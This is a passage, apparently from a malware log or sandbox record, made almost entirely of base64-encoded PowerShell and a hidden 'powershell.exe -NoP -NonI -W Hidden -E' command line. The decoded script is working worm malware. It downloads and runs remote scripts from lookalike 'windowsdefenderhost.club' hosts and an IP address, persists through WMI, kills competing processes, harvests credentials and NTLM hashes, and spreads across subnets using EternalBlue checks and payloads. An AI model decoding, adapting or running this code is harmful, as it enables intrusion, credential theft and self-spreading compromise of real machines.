gBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9A